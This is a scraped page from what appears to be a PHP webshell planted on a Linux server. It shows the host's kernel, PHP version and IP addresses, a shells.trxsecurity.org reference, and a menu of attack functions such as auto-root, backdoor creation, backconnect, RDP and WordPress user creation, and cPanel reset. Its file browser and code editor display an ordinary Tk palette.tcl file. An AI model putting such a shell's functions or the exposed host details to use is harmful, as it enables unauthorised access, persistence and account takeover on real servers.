Linux node5458.myfcloud.com 6.10.2-x86_64-linode165 #1 SMP PREEMPT_DYNAMIC Tue Jul 30 15:03:21 EDT 2024 x86_64
Apache
: 45.79.123.194 | : 18.226.150.47
16 Domain
7.4.33
addify5
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
tk8.5 /
[ HOME SHELL ]
Name
Size
Permission
Action
demos
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
msgs
[ DIR ]
drwxr-xr-x
ttk
[ DIR ]
drwxr-xr-x
bgerror.tcl
7.93
KB
-rw-r--r--
button.tcl
19.5
KB
-rw-r--r--
choosedir.tcl
9.42
KB
-rw-r--r--
clrpick.tcl
20.8
KB
-rw-r--r--
comdlg.tcl
7.54
KB
-rw-r--r--
console.tcl
28.94
KB
-rw-r--r--
dialog.tcl
5.87
KB
-rw-r--r--
entry.tcl
16.55
KB
-rw-r--r--
focus.tcl
4.74
KB
-rw-r--r--
listbox.tcl
13.65
KB
-rw-r--r--
menu.tcl
36.86
KB
-rw-r--r--
mkpsenc.tcl
26.56
KB
-rw-r--r--
msgbox.tcl
16.64
KB
-rw-r--r--
obsolete.tcl
5.46
KB
-rw-r--r--
optMenu.tcl
1.55
KB
-rw-r--r--
palette.tcl
7.68
KB
-rw-r--r--
panedwindow.tcl
5.05
KB
-rw-r--r--
safetk.tcl
7.09
KB
-rw-r--r--
scale.tcl
7.43
KB
-rw-r--r--
scrlbar.tcl
11.72
KB
-rw-r--r--
spinbox.tcl
14.73
KB
-rw-r--r--
tclIndex
21.77
KB
-rw-r--r--
tearoff.tcl
5.02
KB
-rw-r--r--
text.tcl
31.72
KB
-rw-r--r--
tk.tcl
17.66
KB
-rw-r--r--
tkfbox.tcl
52.78
KB
-rw-r--r--
unsupported.tcl
11.12
KB
-rw-r--r--
xmfbox.tcl
25.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : palette.tcl
# palette.tcl -- # # This file contains procedures that change the color palette used # by Tk. # # Copyright (c) 1995-1997 Sun Microsystems, Inc. # # See the file "license.terms" for information on usage and redistribution # of this file, and for a DISCLAIMER OF ALL WARRANTIES. # # ::tk_setPalette -- # Changes the default color scheme for a Tk application by setting # default colors in the option database and by modifying all of the # color options for existing widgets that have the default value. # # Arguments: # The arguments consist of either a single color name, which # will be used as the new background color (all other colors will # be computed from this) or an even number of values consisting of # option names and values. The name for an option is the one used # for the option database, such as activeForeground, not -activeforeground. proc ::tk_setPalette {args} { if {[winfo depth .] == 1} { # Just return on monochrome displays, otherwise errors will occur return } # Create an array that has the complete new palette. If some colors # aren't specified, compute them from other colors that are specified. if {[llength $args] == 1} { set new(background) [lindex $args 0] } else { array set new $args } if {![info exists new(background)]} { error "must specify a background color" } set bg [winfo rgb . $new(background)] if {![info exists new(foreground)]} { # Note that the range of each value in the triple returned by # [winfo rgb] is 0-65535, and your eyes are more sensitive to # green than to red, and more to red than to blue. foreach {r g b} $bg {break} if {$r+1.5*$g+0.5*$b > 100000} { set new(foreground) black } else { set new(foreground) white } } lassign [winfo rgb . $new(foreground)] fg_r fg_g fg_b lassign $bg bg_r bg_g bg_b set darkerBg [format #%02x%02x%02x [expr {(9*$bg_r)/2560}] \ [expr {(9*$bg_g)/2560}] [expr {(9*$bg_b)/2560}]] foreach i {activeForeground insertBackground selectForeground \ highlightColor} { if {![info exists new($i)]} { set new($i) $new(foreground) } } if {![info exists new(disabledForeground)]} { set new(disabledForeground) [format #%02x%02x%02x \ [expr {(3*$bg_r + $fg_r)/1024}] \ [expr {(3*$bg_g + $fg_g)/1024}] \ [expr {(3*$bg_b + $fg_b)/1024}]] } if {![info exists new(highlightBackground)]} { set new(highlightBackground) $new(background) } if {![info exists new(activeBackground)]} { # Pick a default active background that islighter than the # normal background. To do this, round each color component # up by 15% or 1/3 of the way to full white, whichever is # greater. foreach i {0 1 2} color $bg { set light($i) [expr {$color/256}] set inc1 [expr {($light($i)*15)/100}] set inc2 [expr {(255-$light($i))/3}] if {$inc1 > $inc2} { incr light($i) $inc1 } else { incr light($i) $inc2 } if {$light($i) > 255} { set light($i) 255 } } set new(activeBackground) [format #%02x%02x%02x $light(0) \ $light(1) $light(2)] } if {![info exists new(selectBackground)]} { set new(selectBackground) $darkerBg } if {![info exists new(troughColor)]} { set new(troughColor) $darkerBg } # let's make one of each of the widgets so we know what the # defaults are currently for this platform. toplevel .___tk_set_palette wm withdraw .___tk_set_palette foreach q { button canvas checkbutton entry frame label labelframe listbox menubutton menu message radiobutton scale scrollbar spinbox text } { $q .___tk_set_palette.$q } # Walk the widget hierarchy, recoloring all existing windows. # The option database must be set according to what we do here, # but it breaks things if we set things in the database while # we are changing colors...so, ::tk::RecolorTree now returns the # option database changes that need to be made, and they # need to be evalled here to take effect. # We have to walk the whole widget tree instead of just # relying on the widgets we've created above to do the work # because different extensions may provide other kinds # of widgets that we don't currently know about, so we'll # walk the whole hierarchy just in case. eval [tk::RecolorTree . new] destroy .___tk_set_palette # Change the option database so that future windows will get the # same colors. foreach option [array names new] { option add *$option $new($option) widgetDefault } # Save the options in the variable ::tk::Palette, for use the # next time we change the options. array set ::tk::Palette [array get new] } # ::tk::RecolorTree -- # This procedure changes the colors in a window and all of its # descendants, according to information provided by the colors # argument. This looks at the defaults provided by the option # database, if it exists, and if not, then it looks at the default # value of the widget itself. # # Arguments: # w - The name of a window. This window and all its # descendants are recolored. # colors - The name of an array variable in the caller, # which contains color information. Each element # is named after a widget configuration option, and # each value is the value for that option. proc ::tk::RecolorTree {w colors} { upvar $colors c set result {} set prototype .___tk_set_palette.[string tolower [winfo class $w]] if {![winfo exists $prototype]} { unset prototype } foreach dbOption [array names c] { set option -[string tolower $dbOption] set class [string replace $dbOption 0 0 [string toupper \ [string index $dbOption 0]]] if {![catch {$w configure $option} value]} { # if the option database has a preference for this # dbOption, then use it, otherwise use the defaults # for the widget. set defaultcolor [option get $w $dbOption $class] if {$defaultcolor eq "" || \ ([info exists prototype] && \ [$prototype cget $option] ne "$defaultcolor")} { set defaultcolor [lindex $value 3] } if {$defaultcolor ne ""} { set defaultcolor [winfo rgb . $defaultcolor] } set chosencolor [lindex $value 4] if {$chosencolor ne ""} { set chosencolor [winfo rgb . $chosencolor] } if {[string match $defaultcolor $chosencolor]} { # Change the option database so that future windows will get # the same colors. append result ";\noption add [list \ *[winfo class $w].$dbOption $c($dbOption) 60]" $w configure $option $c($dbOption) } } } foreach child [winfo children $w] { append result ";\n[::tk::RecolorTree $child c]" } return $result } # ::tk::Darken -- # Given a color name, computes a new color value that darkens (or # brightens) the given color by a given percent. # # Arguments: # color - Name of starting color. # perecent - Integer telling how much to brighten or darken as a # percent: 50 means darken by 50%, 110 means brighten # by 10%. proc ::tk::Darken {color percent} { foreach {red green blue} [winfo rgb . $color] { set red [expr {($red/256)*$percent/100}] set green [expr {($green/256)*$percent/100}] set blue [expr {($blue/256)*$percent/100}] break } if {$red > 255} { set red 255 } if {$green > 255} { set green 255 } if {$blue > 255} { set blue 255 } return [format "#%02x%02x%02x" $red $green $blue] } # ::tk_bisque -- # Reset the Tk color palette to the old "bisque" colors. # # Arguments: # None. proc ::tk_bisque {} { tk_setPalette activeBackground #e6ceb1 activeForeground black \ background #ffe4c4 disabledForeground #b0b0b0 foreground black \ highlightBackground #ffe4c4 highlightColor black \ insertBackground black \ selectBackground #e6ceb1 selectForeground black \ troughColor #cdb79e }
Close